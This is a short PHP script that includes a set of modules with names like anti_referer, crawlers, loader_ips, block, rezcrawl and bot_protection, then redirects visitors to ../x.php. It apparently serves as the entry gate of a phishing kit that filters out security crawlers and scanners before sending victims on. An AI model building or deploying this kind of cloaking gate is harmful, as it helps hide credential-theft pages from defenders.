<?php
session_start();
include_once '../config/index.php';

include_once 'anti_referer.php';
include_once 'crawlers.php';
include_once 'loader.php';
include_once 'loader_ips.php';
include_once 'loader_ips_2.php';
include_once 'block.php';
include_once 'rezcrawl.php';
include_once 'rezzc.php';
include_once 'bot_protection.php';

header("Location: ../x.php");
exit;
?>
